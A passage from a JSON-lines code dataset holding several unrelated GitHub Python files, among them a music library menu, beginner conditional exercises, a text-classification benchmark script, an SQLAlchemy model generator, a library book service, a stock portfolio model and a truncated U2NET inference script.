music_reports.delete_album(albums_list)\n\n elif choice == \"10\":\n os.system(\"clear\")\n print_ascii_art.print_ending_art()\n loop = False\n\n else:\n os.system(\"clear\")\n print(\"Please enter numbers from 1 to 10: \")\n\n\ndef main():\n os.system(\"clear\")\n display_menu()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MichalPula/MusicLibrary","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7953565873","text":"def diff21(n):\r\n if (n > 21): \r\n return (2 * (abs(n - 21)))\r\n else: \r\n return (abs(n - 21))\r\n\r\ndef fix_teen(n):\r\n if (n >= 13 and n <= 19) and (n != 15 and n != 16):\r\n return 0\r\n else:\r\n return n\r\n\r\ndef no_teen_sum(a, b, c):\r\n return fix_teen(a) + fix_teen(b) + fix_teen(c)\r\n \r\ndef sorta_sum(a, b):\r\n if (a + b >= 10 and a + b <= 19):\r\n return 20\r\n else: return a + b\r\n\r\ndef lone_sum(a, b, c):\r\n if a == b and b == c:\r\n return 0\r\n elif a == b:\r\n return c\r\n elif a == c:\r\n return b\r\n elif b == c:\r\n return a\r\n else: return a + b + c\r\n \r\ndef lucky_sum(a, b, c):\r\n if a == 13:\r\n return 0\r\n elif b == 13:\r\n return a\r\n elif c == 13:\r\n return a + b\r\n else: return a + b + c\r\n \r\ndef round10(num):\r\n if (num % 10 >= 5):\r\n return ((num / 10) + 1) * 10\r\n else: return ((num / 10) * 10)\r\n\r\ndef round_sum(a, b, c):\r\n return round10(a) + round10(b) + round10(c)\r\n\r\ndef make_bricks(small, big, goal):\r\n if big == 0:\r\n return goal <= small\r\n elif small == 0 and big != 0:\r\n return goal % 5 == 0\r\n elif (small) + (big * 5) < goal:\r\n return False\r\n elif (goal % 5) <= small:\r\n return True\r\n else:\r\n return 
False\r\n\r\ndef close_far(a, b, c):\r\n if ((abs(b - a)) <= 1 and ((abs(c - a)) >= 2 and (abs(c - b))) >= 2):\r\n return True\r\n elif (abs(c - a)) <= 1 and (abs(b - a)) >= 2 and (abs(b - c)) >= 2:\r\n return True\r\n else: return False\r\n \r\ndef magicPair(a,b):\r\n if b < 10:\r\n if (a / 10) == b:\r\n if (a / 10) + b == (a % 10):\r\n return True\r\n if (a % 10) == b:\r\n if (a % 10) + b == (a / 10):\r\n return True\r\n else:\r\n if (a / 10) == (b / 10):\r\n if (a / 10) + (b / 10) == (a % 10) + (b % 10):\r\n return True\r\n if (a % 10) == (b % 10):\r\n if (a % 10) + (b % 10) == (a / 10) + (b / 10):\r\n return True\r\n if (a / 10) == (b % 10):\r\n if (a / 10) + (b % 10) == (a % 10) + (b / 10):\r\n return True\r\n else: return False\r\n if (a % 10) == (b / 10):\r\n if (a % 10) + (b / 10) == (a / 10) + (b % 10):\r\n return True\r\n if (a / 100) == (b / 10):\r\n if (a / 100) + (b / 10) == ((a / 10) % 10) + ((a % 100) % 10):\r\n return True\r\n if ((a % 100) % 10) == (b / 10):\r\n if ((a % 100) % 10) + (b / 10) == ((a / 10) % 10) + (b % 10):\r\n return True\r\n else: return False\r\n else: return False","repo_name":"rickey-dong/introcs","sub_path":"intro1/conditionals.py","file_name":"conditionals.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"25058221450","text":"from __future__ import print_function\nfrom __future__ import division\nimport logging, os\nimport numpy as np\nfrom utils.optparse import Arguments as arguments\nfrom canon60 import tfidf\nfrom data import process\nfrom sklearn.metrics import confusion_matrix, f1_score, accuracy_score, precision_score, recall_score\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef prepare():\n \"\"\"\n Logging and arguments\n :return:\n \"\"\"\n\n # Logger\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n # --- keep this logger at DEBUG level, until aguments are processed\n ch.setLevel(logging.INFO)\n formatter = logging.Formatter(\n \"%(asctime)s - %(module)s - %(levelname)s - %(message)s\"\n )\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n # --- Get Input Arguments\n in_args = arguments(logger)\n opts = in_args.parse()\n\n fh = logging.FileHandler(opts.log_file, mode=\"a\")\n fh.setLevel(logging.INFO)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n # --- restore ch logger to INFO\n ch.setLevel(logging.INFO)\n\n return logger, opts\n\n\n\ndef evaluate(y_test, pred):\n acc = accuracy_score(y_test, pred)\n f1_micro = f1_score(y_test, pred, average='micro')\n p_micro = precision_score(y_test, pred, average='micro')\n r_micro = recall_score(y_test, pred, average='micro')\n\n f1_macro = f1_score(y_test, pred, average='macro')\n p_macro = precision_score(y_test, pred, average='macro')\n r_macro = recall_score(y_test, pred, average='macro')\n\n return acc, f1_macro, p_macro, r_macro\n\n\ndef main():\n \"\"\"\n Starts all\n :return:\n \"\"\"\n logger, opts = prepare()\n logger.info(\"---- CANON60 ----\")\n train_path = opts.i + \"/train\"\n test_path = opts.i + \"/test\"\n dt_train = process.canon60Dataset(train_path, join_all=True)\n dt_test = process.canon60Dataset(test_path, join_all=True)\n\n x_train = dt_train.X\n y_train = dt_train.y\n fnames_train = dt_train.fnames\n\n x_test = dt_test.X\n y_test = dt_test.y\n fnames_test = dt_test.fnames\n vocab = process.read_vocab_list(opts.vocab_path)\n logger.info(\"Results\")\n modelos = [\"FF\", ]\n 
representation = [\"tfidf\", ]\n max_features = [500,1000,2000,5000,10000,15000, 20000,len(vocab)]\n # max_features = [500,10000]\n min_ngrams = [1]\n max_ngram = [2,3,4,5,6,7,8,9]\n # max_ngram = [3,4]\n\n\n for model_type in modelos:\n for repren in representation:\n model_type_name = model_type+\"_\"+repren\n logger.info(\"Clasificador: {}\".format(model_type_name))\n file = open(\"{}/{}\".format(opts.work_dir, model_type_name), \"w\")\n file.write(\"classifier,max_features,min_ngram,max_ngram,accuracy,f1_macro,precision_macro,recall_macro\\n\")\n opts.model = model_type\n for max_feat in max_features:\n\n for min_ngram in min_ngrams:\n for up in max_ngram:\n rep = TfidfVectorizer(ngram_range=(min_ngram, up), max_features=max_feat, vocabulary=vocab[:max_feat])\n texts_rep_train = rep.fit_transform(x_train)\n texts_rep_train = texts_rep_train.toarray()\n text_test_rep = rep.transform(x_test)\n text_test_rep = text_test_rep.toarray()\n logger.info(texts_rep_train.shape)\n logger.info(text_test_rep.shape)\n\n model = tfidf.Model(texts_rep_train, y_train, text_test_rep, y_test,fnames_train,fnames_test,\n layers=opts.layers,\n logger=logger, opts=opts)\n\n pred, y_true = model.get_results()\n # pred, y_true = results[0], results[2]\n\n acc, f1_macro, p_macro, r_macro = evaluate(y_true, pred)\n # acc, f1_macro, p_macro, r_macro = random.random(), random.random(), random.random(), random.random()\n res = \"{},{},{},{},{},{},{},{}\\n\".format(model_type, max_feat, min_ngram, up, acc, f1_macro, p_macro, r_macro)\n\n logger.info(res)\n file.write(res)\n file.flush()\n file.close()\n\n logger.info(\"---- FIN ----\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"JoseRPrietoF/autoria","sub_path":"canon60_results_NN.py","file_name":"canon60_results_NN.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"34181377967","text":"from os import path, getcwd\nfrom pathlib import Path\nfrom shutil import copyfile, copytree\nfrom typing import Optional\n\nfrom modelgen.helper import Helper\nfrom modelgen import (__file__, constants, Validate, Parser, \n Template, alchemygen, metagen, walk)\n\nclass ModelGenerator(Helper):\n\n def __init__(self, init: Optional[str]=False, createmodel: bool=False, \n file: str=None, alembic: bool=False,**kwargs):\n '''\n This class is initialized by taking in the argument values \n passed from the cli. \n\n Args: \n init (Optional[str] or False): init is set to true if \n --init is called from the cli and a folder name is\n passed. The folder name has to be new, if an existing\n folder name is passed, an exception will be raised\n asking to pass a new folder name/path. \n If init is not called from cli, it is set to False \n by default.\n\n createmodel (bool): createmodel is set to true if \n --createmodel is called from the command line.\n --createmodel also needs another argument\n -f or --file which points to the path of the \n schema yaml file. This file will be used to create\n sqlalchemy model code in python\n\n file (str): filepath of the yaml schema template file.\n \n alembic (bool): if set, alembic support will be set\n to true. A folder named metadata will be created\n with an __init__.py. 
This py file will have the\n sqlalchemy metadata imported from the file \n generated by the createmodel command.\n '''\n Helper.__init__(self)\n self.create_structure(init=init)\n self.create_models(createmodel=createmodel, file=file, alembic=alembic) \n\n def _create_template_folder(self, **kwargs) -> bool:\n '''\n Create a folder called `templates`. This folder contains an\n example schema template file required to get started.\n\n Returns bool, True if creation is successful, False otherwise. \n '''\n try:\n init = kwargs.get('init')\n templates_src_path = path.join('/',*(__file__.split('/')[:-1]),'templates')\n templates_dst_path = path.join(init, 'templates')\n if path.exists(templates_dst_path):\n raise FileExistsError\n self.logger.info(f'Creating templates folder at {templates_dst_path}')\n Path(templates_dst_path).mkdir(parents=True, exist_ok=False)\n self.logger.debug('Templates folder creation successful')\n self.logger.info(f'Creating an example yaml schema file at {templates_dst_path}/example.yaml')\n copyfile((path.join(templates_src_path, 'example.yaml')), \n path.join(templates_dst_path, 'example.yaml'))\n return True\n except FileExistsError as e:\n self.logger.exception('Error occurred while creating templates folder')\n self.logger.exception(e)\n raise FileExistsError(\"Folder exists. Please specify a new folder name\") from FileExistsError \n\n def _create_alembic_folder(self, **kwargs):\n '''\n This function is responsible for creating alembic's \n folder structure. The folder created is named `alembic`.\n This folder contains files __init__.py, evn.py, README,\n script.py.mako and a folder named `versions`. This folder\n stores version files for every table level change made.\n\n Returns bool, True if folder creation is successful,\n False otherwise.\n '''\n try:\n init = kwargs.get('init')\n if path.isabs(init):\n dst_path = path.join(init)\n else:\n dst_path = path.join(getcwd(), init)\n if path.exists(dst_path):\n raise FileExistsError\n alembic_path = path.join('/',*(__file__.split('/')[:-1]),'alembic_migrate')\n self.logger.info(f'Creating alembic folder at {dst_path}')\n ini_src_path = path.join('/',*(__file__.split('/')[:-1]),'alembic.ini')\n copytree(alembic_path, path.join(dst_path, 'alembic_migrate'))\n # Path(path.join(self.dst_path, 'alembic','versions')).mkdir(parents=True, exist_ok=False)\n copyfile(ini_src_path, path.join(dst_path, 'alembic.ini'))\n return True\n except FileExistsError as e:\n self.logger.exception('Error occurred while creating alembic folder')\n self.logger.exception(e)\n raise FileExistsError(\"Folder exists. Please specify a new folder name\") from FileExistsError \n\n def _create_checkpoint_file(self, **kwargs) -> bool:\n '''\n Create a checkpoint file in the folder name/path\n passed while initializing modelgen. The file created\n is named `.modelgen`. This file let's the program know\n that modelgen has been initialized in the directory\n\n Returns bool, True if successful, False otherwise.\n '''\n init = kwargs.get('init')\n self.write_to_file(path=path.join(init, '.modelgen'), data='')\n return True\n\n def _find_checkpoint_file(self) -> bool:\n '''\n Check if the checkpoint file `.modelgen` exists in\n the directory or not. 
This function is run before \n creating the sqlalchemy python code.\n\n Returns bool, True if file exists, False if file\n doesn't exist.\n '''\n chkpnt_filepath = path.join(getcwd(), '.modelgen')\n if not path.exists(chkpnt_filepath):\n err_str = 'Either modelgen is not initialized, or you are in the wrong folder\\n'\n err_str += 'Please initialize modelgen (modelgen --source yaml --init ./YOUR_FOLDER_NAME)'\n err_str += ' or execute commands from /path/YOUR_FOLDER_NAME'\n raise FileNotFoundError(err_str)\n else:\n return True\n\n def _create_model(self, datasource: str, alembic: bool=False, \n filepath: str=None) -> bool:\n '''\n Create sqlalchemy code, based on the schema\n defined in the yaml schema template file. The code files\n are created in a folder called `models` and the files\n are created by the datasource name. Example: if the datasource \n name is inventory, the model file will be \n `models/inventory.py`.\n\n Args:\n datasource (str): name of the datasource.\n This is defined by the name of the\n schema template yaml file. \n for example, if the schema file is named \n inventory.yaml, the datasource name will be \n inventory\n\n alembic (bool, default: False): If set to True,\n python code to support alembic migrations \n will also be created.\n\n filepath (str, default: None): filepath of the\n schema template yaml file. If nothing is passed,\n a path will be constructed using current directory\n and the datasource name. This consturcted path\n will be current_working_dir/templates/datasource.yaml\n\n Returns:\n (bool): True, if sqlalchemy model code generation is successful\n False, if sqlalchemy model code generation fails\n '''\n if not filepath:\n filepath = path.join(constants.templates_folder, f\"{datasource}.yaml\")\n Validate(filepath=filepath).validate()\n parser = Parser(filepath=filepath)\n src_template = Template(alchemygen)\n py_code = src_template.render(datasource=datasource,yaml_data=parser.data, cst=constants, bool=bool)\n Path(constants.models_folder).mkdir(parents=True, exist_ok=True)\n py_filepath = path.join(constants.models_folder, f'{datasource}.py')\n self.write_to_file(path=py_filepath, data=py_code)\n if alembic:\n self._create_alembic_meta()\n return True\n\n def _create_alembic_meta(self) -> bool:\n '''\n Creates code required to support alembic migrations.\n The code is created in a folder `metadata`. 
A file\n named __init__.py is created in the `metadata` folder\n which imports the sqlalchemy metadata from all the models\n sitting in the `models` folder.\n\n Returns bool, True if code creation is successful,\n False if code creation fails.\n '''\n alembic_template = Template(metagen)\n _, _, filenames = next(walk(constants.models_folder))\n alembic_meta = alembic_template.render(filenames=filenames, cst=constants,\n splitext=path.splitext)\n Path(constants.alembic_meta_folder).mkdir(parents=True, exist_ok=True)\n alembic_meta_filepath = path.join(constants.alembic_meta_folder, '__init__.py')\n self.write_to_file(path=alembic_meta_filepath, data=alembic_meta)\n return True\n\n def create_structure(self, init: bool=False) -> bool:\n if bool(init):\n self._create_alembic_folder(init=init)\n self._create_template_folder(init=init)\n self._create_checkpoint_file(init=init)\n return True\n return None\n\n def create_models(self, createmodel: bool=False, file: str=None, alembic: bool=False) -> bool:\n if bool(createmodel) and bool(file):\n if file.endswith('.yaml'):\n datasource = file.split('.yaml')[0].split('/')[-1]\n elif file.endswith('yml'):\n datasource = file.split('.yml')[0].split('/')[-1]\n else:\n raise NameError('Please specify a .yaml or .yml file')\n self._find_checkpoint_file()\n self.logger.info(f\"Creating models at {file}\")\n self._create_model(datasource=datasource, alembic=alembic)\n return True\n return None","repo_name":"shrinivdeshmukh/sqlalchemy-modelgen","sub_path":"modelgen/modelgenerator.py","file_name":"modelgenerator.py","file_ext":"py","file_size_in_byte":10052,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"94"} +{"seq_id":"23880907983","text":"from Project.____Domain.Entities.Book import Book\nfrom Project.____Domain.Validators.Validator import Validator\nfrom Project._____Utils.Exceptions import bookNotInMemError, duplicatedBookError, noBooksInMemError, shouldNotBeRaisedError\nfrom Project.___Repository.BookRepo import BookRepository\nclass BookService:\n def __init__(self, bookRepo, validator):\n \"\"\"\n initializeaza un nou service pentru carti care are acces la repositoriul de carti si la un validator\n :param bookRepo: repositoriul cu carti\n :param validator: validatorul de obiecte\n \"\"\"\n self.__bookRepo = bookRepo\n self.__validator = validator\n\n def adauga_carte(self, title, author, description, k_copies=1):\n \"\"\"\n adauga o carte nou in memorie\n :param title: str: titlu\n :param author: str: autor\n :param description: str: descriere\n :param k_copies: int: nr exemplare\n :return: none\n :raises: duplicatedBookError daca cartea e deja in memorie\n \"\"\"\n new_book = Book(title, author, description, k_copies)\n self.__validator.validateBook(new_book)\n\n book_in_memory = self.__bookRepo.find(new_book)\n if book_in_memory is not None:\n raise duplicatedBookError\n\n self.__bookRepo.append(new_book)\n def sterge_carte(self, title, author):\n \"\"\"\n sterge o carte din memorie\n :param title: str: titlu\n :param author: str: autor\n :return: none\n :raises: bookNotInMemError daca cartea nu e in memorie\n \"\"\"\n new_book = Book(title, author)\n self.__validator.validateBook(new_book)\n\n book_in_memory = self.__bookRepo.find(new_book)\n if book_in_memory is None:\n raise bookNotInMemError\n\n self.__bookRepo.remove(book_in_memory)\n def modifica_carte(self, title, author, newTitle=None, newAuthor=None, new_k_copies=None, new_desc=None):\n \"\"\"\n modifica un camp dintr-o carte din memorie\n 
:param title: str: titlu\n :param author: str: autor\n :param newTitle: str: titlu nou\n :param newAuthor: str: autor nou\n :param new_k_copies: int: nr exemplare nou\n :param new_desc: str: descriere noua\n :return: none\n :raises: bookNotInMemError daca cartea nu e in memorie\n \"\"\"\n new_book = Book(title, author)\n self.__validator.validateBook(new_book)\n\n book_in_memory = self.__bookRepo.find(new_book)\n if book_in_memory is None:\n raise bookNotInMemError\n\n self.__bookRepo.remove(book_in_memory)\n if newTitle is not None:\n try_book = Book(newTitle, author)\n self.__validator.validateBook(try_book)\n if self.__bookRepo.find(try_book) is not None:\n raise duplicatedBookError\n\n book_in_memory.setTitle(newTitle)\n elif newAuthor is not None:\n try_book = Book(title, newAuthor)\n self.__validator.validateBook(try_book)\n if self.__bookRepo.find(try_book) is not None:\n raise duplicatedBookError\n\n book_in_memory.setAuthor(newAuthor)\n elif new_k_copies is not None:\n book_in_memory.setTotalCopies(new_k_copies)\n elif new_desc is not None:\n book_in_memory.setDescription(new_desc)\n else:\n raise shouldNotBeRaisedError\n self.__bookRepo.append(book_in_memory)\n\n def cauta_exemplare_carte(self, title, author):\n \"\"\"\n returneaza numarul de exemplare dintr-o carte\n :param title: str: titlu\n :param author: str: autor\n :return: int: nr exemplare\n :raises: bookNotInMemError daca cartea nu exista in memorie\n \"\"\"\n new_book = Book(title, author)\n self.__validator.validateBook(new_book)\n\n book_in_memory = self.__bookRepo.find(new_book)\n if book_in_memory is None:\n raise bookNotInMemError\n\n k_copies = book_in_memory.getTotalCopies()\n return k_copies\n # def raport_carti_inchiriate(self):\n # \"\"\"\n # creeaza un raport cu cartile sortate dupa nr de inchirieri\n # :return: str: un text cu toate cartile sortate\n # \"\"\"\n # if len(self.__bookRepo.getAll()) == 0:\n # raise noBooksInMemError\n #\n # self.__bookRepo.sort_by(byBorrows=1, reverse=True)\n # raport = self.__bookRepo.get_report()\n # return raport\n\n\n# def test_adauga_carte():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n#\n# assert len(bookRepository.getAll()) == 1\n#\n# try:\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n# assert False\n# except duplicatedBookError:\n# assert True\n# def test_sterge_carte():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n# bookService.sterge_carte(\"Ana\", \"Maria\")\n#\n# assert len(bookRepository.getAll()) == 0\n#\n# try:\n# bookService.sterge_carte(\"Ana\", \"Maria\")\n# assert False\n# except bookNotInMemError:\n# assert True\n# def test_modifica_carte():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n#\n# bookService.modifica_carte(\"Ana\", \"Maria\", \"Pisici\")\n#\n# assert bookRepository.getAll()[0].getTitle() == \"Pisici\"\n#\n# try:\n# bookService.modifica_carte(\"Ana\", \"Maria\")\n# assert False\n# except bookNotInMemError:\n# assert True\n# def test_cautare():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", 
\"pisici\", 10)\n#\n# assert bookService.cauta_exemplare_carte(\"Ana\", \"Maria\") == 10\n#\n# try:\n# bookService.sterge_carte(\"Ana\", \"nush\")\n# assert False\n# except bookNotInMemError:\n# assert True\n# def test_raport():\n# validator = Validator()\n# bookRepository = BookRepository()\n# bookService = BookService(bookRepository, validator)\n# bookService.adauga_carte(\"Ana\", \"Maria\", \"pisici\", 10)\n#\n# assert bookService.raport_carti_inchiriate() is not None\n#\n# try:\n# bookService.sterge_carte(\"Ana\", \"Maria\")\n# bookService.raport_carti_inchiriate()\n# assert False\n# except noBooksInMemError:\n# assert True\n#\n#\n# test_adauga_carte()\n# test_sterge_carte()\n# test_modifica_carte()\n# test_cautare()\n# test_raport()","repo_name":"beji02/College-projects-2021-2022","sub_path":"Python projects/Library manager/Project/__Controller/BookService.py","file_name":"BookService.py","file_ext":"py","file_size_in_byte":6831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1015851493","text":"import pickle\nimport numpy as np\nimport scipy.sparse as sparseMatrix\n\ndef loadFiles():\n durgDict = {}\n drugidx = 0\n\n with open(\"word_dict.dict\", \"rb\") as f:\n wordDict = pickle.load(f)\n #get dimension\n dimension = 0\n for i in wordDict.items():\n if i[1] > dimension:\n dimension = i[1]\n f.close()\n\n print(\"word dict loaded.\")\n\n print(\"word dict inverse loaded.\")\n\n with open(\"drug_adr.dict\", \"rb\") as f:\n subDict = pickle.load(f)\n f.close()\n for i in subDict.keys():\n durgDict[i.strip().lower()] = drugidx\n drugidx += 1\n\n with open(\"/data/work/huaminz2/CS410/project/GuoShijie/word_matrix.matrix\", \"rb\") as f:\n matrix = pickle.load(f)\n f.close()\n print(\"doc dict loaded.\")\n print(\"matrix shape: \" + str(matrix.shape))\n print(\"=======Initialization completed========\")\n return matrix, wordDict, durgDict, dimension\n\ndef getDegree(matrix,drugDict,wordDict):\n rs = {}\n drugDegree = {}\n for drug in drugDict:\n idx = wordDict[drug]\n degree = len(matrix[idx].nonzero()[1])\n if degree >= 0:\n rs[drug] = idx\n drugDegree[drug] = degree\n rs = rs.items()\n drugDegree = drugDegree.items()\n rs = sorted(rs, key=lambda x: x[1])\n drugDegree = sorted(drugDegree, key=lambda x: x[1])\n return rs,drugDegree\n\n\nif __name__ == '__main__':\n matrix, wordDict, durgDict, dimension = loadFiles()\n rs, drugDegree = getDegree(matrix,durgDict,wordDict)\n #l = len(rs)\n rs = rs[0:99]\n drugDegree = drugDegree[0:99]\n for i in rs:\n print(i)\n fo = open(\"drug_degree.dict\", \"wb\")\n pickle.dump(drugDegree, fo)\n fo.close()\n","repo_name":"Lycbel/410ProjectFinal","sub_path":"Web/cs410/searchAlgorithm/checkdrug.py","file_name":"checkdrug.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"14035720489","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nwith open('/var/www/html/information_theory/feima/uploads/s300.pkl', 'rb') as f:\n (stock_to_id, id_to_stock) = pickle.load(f)\n\nm = 300 # num of stocks we use\nmax_n = 6000\n\ndata_mat = np.ones((m, max_n))*-1\n\n_step = 0\nstep = 1\nall_step = 0\nB = []\nstock_state = np.zeros(m, dtype=int)\n\ntime_dict = {}\ndef time_to_id(time): \n global time_dict\n if time not in time_dict.keys():\n time_dict[time] = len(time_dict.keys())\n return time_dict[time]\n\ndef build_mat(ss, history_stock_data):\n 
global data_mat\n '''returns a m x s data matrix'''\n df = history_stock_data\n for ind, row in df.iterrows():\n s = row['Stock Code']\n if s not in stock_to_id.keys():\n continue\n t = str(row['Time'])\n p = row['Opening Price']\n s_id = stock_to_id[s]\n t_id = time_to_id(t)\n if s_id < m and t_id < max_n:\n data_mat[s_id, t_id] = p\n\ndef predict_next_x(P, index, w=5):\n t = index-1\n x = np.zeros(P.shape[1]) # x_t+1\n if index < w:\n w = index\n for k in range(m):\n cnt = 0\n for i in range(w):\n if P[t-i, k] > 0:\n x[k] += (P[t-i, k]/P[t, k]) # formula(1)\n cnt += 1\n if cnt > 0:\n x[k] /= cnt\n return x\n\ndef predict_next_b(B, P, mask, index, epsilon, w=5):\n t = index-1\n b_t = B[-1]\n x_t1 = predict_next_x(P, index, w)\n x_mean = np.mean(x_t1)\n #print(x_t1, x_mean)\n lam = max(0.0, (epsilon-np.dot(b_t,x_t1))/(np.linalg.norm(x_t1-x_mean)**2))\n lam = min(100000, lam)\n #print(lam)\n #print(x_t1 - x_mean)\n b_t1 = b_t + lam * (x_t1 - x_mean)\n res = simplex_proj(b_t1)*mask \n res *= 1/sum(res)\n return res #normalization\n\ndef simplex_proj(y):\n \"\"\" Projection of y onto simplex. \"\"\"\n m = len(y)\n bget = False\n\n s = sorted(y, reverse=True)\n tmpsum = 0.\n\n for ii in range(m-1):\n tmpsum = tmpsum + s[ii]\n tmax = (tmpsum - 1) / (ii + 1);\n if tmax >= s[ii+1]:\n bget = True\n break\n\n if not bget:\n tmax = (tmpsum + s[m-1] -1)/m\n \n return np.maximum(y-tmax,0.)\n\ndef update_state(money, mask, pv, bv):\n global stock_state\n #print(stock_state)\n old_state = stock_state\n all_money = money \n for k in range(m):\n if pv[k] > 0:\n all_money += pv[k] * stock_state[k]\n all_money = all_money*0.8\n new_state = np.zeros(m, dtype=int)\n for i in range(m):\n if pv[i] > 0:\n new_state[i] = int(all_money * bv[i] / pv[i])\n buy_code, buy_num, sell_code, sell_num = [], [], [], []\n for i in range(m):\n if i not in id_to_stock.keys():\n continue\n if new_state[i] < old_state[i] and mask[i] == 1:\n sell_code.append(id_to_stock[i])\n sell_num.append(old_state[i] - new_state[i])\n if new_state[i] > old_state[i] and mask[i] == 1:\n buy_code.append(id_to_stock[i])\n buy_num.append(new_state[i] - old_state[i])\n stock_state = new_state\n #print(buy_code)\n return sell_code, sell_num, buy_code, buy_num\n\ndef invest(data_mat, n, money, mask, w=1, epsilon=1.00001):\n global B\n \n P = data_mat\n '''\n X = np.ones_like(P)\n for i in range(m):\n for j in range(1, n):\n X[i, j] = P[i, j] / P[i, j-1]\n '''\n P = P.transpose()\n #print(P)\n \n if n == 0:\n B.append(np.array([1/m for i in range(m)]))\n else:\n b = predict_next_b(B, P, mask, n, epsilon, w)\n B.append(b)\n #print('B:', B[-1])\n sell_code, sell_num, buy_code, buy_num = update_state(money, mask, P[n], B[-1])\n return sell_code, sell_num, buy_code, buy_num\n\ndef get_avail(hist, tt):\n mask = np.zeros(m)\n for ind, row in hist.iterrows():\n s = row['Stock Code']\n t = row['Time']\n p = row['Opening Price']\n if s not in stock_to_id.keys():\n continue\n s_id = stock_to_id[s]\n if tt == t:\n mask[s_id] = 1\n return mask\n \ndef model(s, money, history_stock_data, investment_data):\n #path='/var/www/html/information_theory/feima/test_data.csv'\n global _step, all_step\n all_step += 1\n \n w=5\n epsilon=1.000000001\n \n if _step > 0 or all_step > 10:\n _step -= 1\n add_data=pd.DataFrame(columns=['Time','Stocks you sell','Corresponding number of stocks you sell',\n 'Stocks you buy','Corresponding number of stocks you buy']) \n add_data=add_data.append({'Time': s}, ignore_index=True)\n return add_data\n \n ss = str(s)\n history_stock_data = 
history_stock_data[-w*520:]\n history_stock_data = history_stock_data.loc[history_stock_data['Time'] == s]\n build_mat(ss, history_stock_data)\n \n _step = step-1\n mask = get_avail(history_stock_data, s)\n sell_code, sell_num, buy_code, buy_num = invest(data_mat, time_to_id(ss), money, mask, w=w, epsilon=epsilon) \n \n add_data=pd.DataFrame(columns=['Time','Stocks you sell','Corresponding number of stocks you sell',\n 'Stocks you buy','Corresponding number of stocks you buy']) \n \n if len(sell_code) > 0 and len(buy_code) > 0:\n s1 = ', '.join([\"%d\"%(x) for x in sell_code])\n s2 = ', '.join([\"%d\"%(x) for x in sell_num])\n s3 = ', '.join([\"%d\"%(x) for x in buy_code])\n s4 = ', '.join([\"%d\"%(x) for x in buy_num])\n add_data=add_data.append({'Time': s,'Stocks you sell':s1,'Corresponding number of stocks you sell':s2,\n 'Stocks you buy':s3,'Corresponding number of stocks you buy':s4}, ignore_index=True) \n elif len(sell_code) > 0:\n s1 = ', '.join([\"%d\"%(x) for x in sell_code])\n s2 = ', '.join([\"%d\"%(x) for x in sell_num])\n add_data=add_data.append({'Time': s,'Stocks you sell':s1,'Corresponding number of stocks you sell':s2}, ignore_index=True) \n elif len(buy_code) > 0:\n s1 = ', '.join([\"%d\"%(x) for x in buy_code])\n s2 = ', '.join([\"%d\"%(x) for x in buy_num])\n add_data=add_data.append({'Time': s,'Stocks you buy':s1,'Corresponding number of stocks you buy':s2}, ignore_index=True) \n else:\n add_data=add_data.append({'Time': s}, ignore_index=True)\n\n return add_data","repo_name":"naiqili/it","sub_path":"task2/Wsp6pQGEPp_20181229_13.py","file_name":"Wsp6pQGEPp_20181229_13.py","file_ext":"py","file_size_in_byte":6396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"37388904380","text":"import os\nfrom skimage import io, transform\nimport torch\nimport torchvision\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms#, utils\nimport collections\n# import torch.optim as optim\n\nimport numpy as np\nfrom PIL import Image\nimport glob\nimport cv2\n\nfrom data_loader_albu import generate_transforms, SalObjDataset, SalObjDatasetT\nfrom albumentations import (\n Compose,\n\tSmallestMaxSize,\n)\n\nfrom model import U2NET # full size version 173.6 MB\nfrom model import U2NETP # small version u2net 4.7 MB\n\n# normalize the predicted SOD probability map\ndef normPRED(d):\n ma = torch.max(d)\n mi = torch.min(d)\n dn = (d-mi) / (ma-mi)\n return dn\n\ndef save_output(image_name, pred, d_dir):\n\n predict = pred\n predict = predict.squeeze()\n predict_np = predict.cpu().data.numpy()\n\n im = Image.fromarray(predict_np * 255).convert('RGB')\n img_name = image_name.split(os.sep)[-1]\n image = io.imread(image_name)\n imo = im.resize((image.shape[1], image.shape[0]), resample=Image.BILINEAR)\n\n pb_np = np.array(imo)\n\n aaa = img_name.split(\".\")\n bbb = aaa[0:-1]\n imidx = bbb[0]\n for i in range(1, len(bbb)):\n imidx = imidx + \".\" + bbb[i]\n\n imo.save(d_dir + imidx + '.png')\n\n######### modified by wjj for more smooth results generate ###########\n# def save_output(image_name, pred, d_dir):\n# img_name = image_name.split(os.sep)[-1]\n# image = cv2.imread(image_name)\n# 